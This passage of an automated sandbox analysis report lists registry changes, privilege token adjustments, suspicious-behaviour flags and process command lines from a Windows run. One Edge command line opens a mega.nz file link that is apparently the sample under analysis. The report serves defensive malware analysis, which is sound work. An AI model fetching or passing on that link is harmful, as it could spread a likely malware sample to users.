| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.bz2\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Pictures" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.7z\ = "7-Zip.7z" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,0" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\ = "lzma Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.bz2\shell\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.7z | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.TAR\SHELL\OPEN\COMMAND | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\ = "zip Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,1" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.cab\DefaultIcon | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.7Z\SHELL\OPEN\COMMAND | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz\ = "txz Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\desktop-1920x1080.jpg:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop-1920x1080.jpg:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop-1920x1080 (1).jpg:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xe4,0x108,0x7ffb3f8746f8,0x7ffb3f874708,0x7ffb3f874718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=audio --mojo-platform-channel-handle=5084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=video_capture --mojo-platform-channel-handle=5812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6316 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x340 0x344
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=6672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
